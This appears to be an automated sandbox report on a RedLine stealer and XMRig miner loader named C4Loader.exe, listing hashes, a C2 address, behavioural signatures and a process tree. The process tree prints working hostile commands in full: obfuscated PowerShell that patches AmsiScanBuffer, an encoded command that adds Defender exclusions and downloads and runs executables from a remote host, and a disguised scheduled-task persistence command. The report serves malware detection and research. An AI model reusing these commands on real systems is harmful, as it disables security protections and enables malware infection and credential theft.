Analysis
-
max time kernel
103s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
16-11-2022 03:20
General
-
Target
C4Loader.exe
-
Size
495KB
-
MD5
e52e99d4ce81f3075dd62ca10f0aba86
-
SHA1
c0e73bfc58b42bf9e02ea126fa842bc7a128f56b
-
SHA256
cde83c58766ae18bd516cfa78098c411fd1d0ebff083896f35fc33b10afa0e50
-
SHA512
b7f735bf1e10723f56f36673a802a4f9dc1986682d95c1038404cbc7f2c1f437bbd2ad056691caa0a2b99b6c3efe180b72224f3a3b43f11eec46491db243be80
-
SSDEEP
12288:x5z183Z0RwnuD9VHG5m6b+5rPuAaD2H5nKr3:lG0qm6oro2H5nM
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
1
C2
107.182.129.73:21733
Attributes
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 20 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 39 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 5 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 9 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 38 IoCs
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 48 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1c7226de-5a1d-41a3-a24b-cbcb88772adf}2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:FuJszSHcGmLx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PdQmAUsySiqBgO,[Parameter(Position=1)][Type]$PbZoUOlGGI)$SoAQWGujYfk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+'el'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+[Char](108)+''+'e'+''+[Char](103)+'at'+[Char](101)+''+[Char](84)+'yp'+[Char](101)+'','C'+[Char](108)+'a'+[Char](115)+'s'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+','+'Ans'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'toCl'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$SoAQWGujYfk.DefineConstructor('RT'+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+'e'+''+'B'+''+'y'+'Si'+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$PdQmAUsySiqBgO).SetImplementationFlags('R'+'u'+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'nag'+[Char](101)+''+'d'+'');$SoAQWGujYfk.DefineMethod('I'+'n'+''+'v'+'o'+[Char](107)+'e','P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+'w'+'S'+''+'l'+''+[Char](111)+'t'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+'l'+'',$PbZoUOlGGI,$PdQmAUsySiqBgO).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $SoAQWGujYfk.CreateType();}$lFGvNQUBSEapX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+'t'+'e'+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType('Mic'+[Char](114)+''+[Char](111)+''+'s'+''+'o'+'f'+[Char](116)+''+'.'+''+'W'+'i'+[Char](110)+''+[Char](51)+''+'2'+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](108)+'FG'+[Char](118)+''+[Char](78)+'Q'+'U'+'B'+[Char](83)+''+[Char](69)+'a'+[Char](112)+''+'X'+'');$HpebEGJgDFOWNf=$lFGvNQUBSEapX.GetMethod(''+'H'+''+[Char](112)+''+[Char](101)+''+[Char](98)+''+[Char](69)+'G'+[Char](74)+'gD'+'F'+'O'+'W'+''+[Char](78)+'f',[Reflection.BindingFlags]'P'+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UtVXrcWreYmiufjWqUP=FuJszSHcGmLx @([String])([IntPtr]);$hWqrtDFDUqJYSNMVyUsiBi=FuJszSHcGmLx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$riAiWXVyOVd=$lFGvNQUBSEapX.GetMethod(''+'G'+''+[Char](101)+''+'t'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+'an'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+'.'+'d'+''+'l'+''+'l'+'')));$KaEliRRCbSTsSb=$HpebEGJgDFOWNf.Invoke($Null,@([Object]$riAiWXVyOVd,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+'r'+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$GxLvkrwdleLTEpeOg=$HpebEGJgDFOWNf.Invoke($Null,@([Object]$riAiWXVyOVd,[Object]('V'+'i'+''+[Char](114)+''+'t'+'u'+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$wUHOIXg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KaEliRRCbSTsSb,$UtVXrcWreYmiufjWqUP).Invoke('a'+[Char](109)+'s'+'i'+''+[Char](46)+'dl'+[Char](108)+'');$HGLoyJzwnpELwLyru=$HpebEGJgDFOWNf.Invoke($Null,@([Object]$wUHOIXg,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+'S'+'ca'+'n'+''+'B'+'u'+'f'+'f'+[Char](101)+''+[Char](114)+'')));$YcpehYUhQr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GxLvkrwdleLTEpeOg,$hWqrtDFDUqJYSNMVyUsiBi).Invoke($HGLoyJzwnpELwLyru,[uint32]8,4,[ref]$YcpehYUhQr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$HGLoyJzwnpELwLyru,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GxLvkrwdleLTEpeOg,$hWqrtDFDUqJYSNMVyUsiBi).Invoke($HGLoyJzwnpELwLyru,[uint32]8,0x20,[ref]$YcpehYUhQr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+'al'+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JZQrKpvsCyDU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$shjWqncoGdijia,[Parameter(Position=1)][Type]$UQudHzzZPn)$uPdDtgeqOqS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+[Char](101)+'m'+[Char](111)+''+'r'+''+[Char](121)+'Mo'+[Char](100)+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+'T'+''+[Char](121)+'p'+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+'l'+[Char](101)+''+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+','+''+[Char](65)+'u'+[Char](116)+''+'o'+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$uPdDtgeqOqS.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+'e'+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'a'+'m'+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+'S'+[Char](105)+'g'+','+'P'+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$shjWqncoGdijia).SetImplementationFlags(''+[Char](82)+''+'u'+'nt'+'i'+''+[Char](109)+'e,'+'M'+'an'+[Char](97)+'g'+'e'+''+[Char](100)+'');$uPdDtgeqOqS.DefineMethod('I'+[Char](110)+''+'v'+'ok'+[Char](101)+'','Pu'+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+'d'+'e'+'B'+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+'New'+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+'Vi'+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$UQudHzzZPn,$shjWqncoGdijia).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+'na'+[Char](103)+''+[Char](101)+'d');Write-Output $uPdDtgeqOqS.CreateType();}$tJHxEeGUkhmKE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+'t'+[Char](101)+'m.'+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'W'+'i'+''+'n'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](116)+''+'J'+''+'H'+''+[Char](120)+''+[Char](69)+''+'e'+'G'+'U'+''+[Char](107)+''+[Char](104)+''+'m'+''+'K'+''+[Char](69)+'');$vLMgXEHYqAxeLB=$tJHxEeGUkhmKE.GetMethod(''+[Char](118)+'L'+[Char](77)+'g'+[Char](88)+''+[Char](69)+''+[Char](72)+''+'Y'+''+[Char](113)+''+'A'+'x'+[Char](101)+'L'+[Char](66)+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'at'+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gbPqENCHwksdqbkamIY=JZQrKpvsCyDU @([String])([IntPtr]);$FyYPOsiNREgSOtfevtUBVs=JZQrKpvsCyDU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aOSCwRvmsQJ=$tJHxEeGUkhmKE.GetMethod(''+[Char](71)+''+'e'+''+'t'+'Mo'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+'el3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$SZyxqFVlAezmHf=$vLMgXEHYqAxeLB.Invoke($Null,@([Object]$aOSCwRvmsQJ,[Object](''+'L'+''+'o'+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+'ra'+'r'+'yA')));$kIrjKrAwHvloLcXMJ=$vLMgXEHYqAxeLB.Invoke($Null,@([Object]$aOSCwRvmsQJ,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+'t'+'')));$eSJQzln=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SZyxqFVlAezmHf,$gbPqENCHwksdqbkamIY).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+'l'+'');$bbdOvDcRKyBzvOSBZ=$vLMgXEHYqAxeLB.Invoke($Null,@([Object]$eSJQzln,[Object](''+[Char](65)+''+[Char](109)+'si'+'S'+''+[Char](99)+''+'a'+'n'+[Char](66)+''+[Char](117)+''+'f'+'f'+'e'+''+[Char](114)+'')));$YAHWxQpwxv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kIrjKrAwHvloLcXMJ,$FyYPOsiNREgSOtfevtUBVs).Invoke($bbdOvDcRKyBzvOSBZ,[uint32]8,4,[ref]$YAHWxQpwxv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bbdOvDcRKyBzvOSBZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kIrjKrAwHvloLcXMJ,$FyYPOsiNREgSOtfevtUBVs).Invoke($bbdOvDcRKyBzvOSBZ,[uint32]8,0x20,[ref]$YAHWxQpwxv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'d'+'i'+'a'+''+[Char](108)+'er'+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4204 -s 8362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3284 -s 7642⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
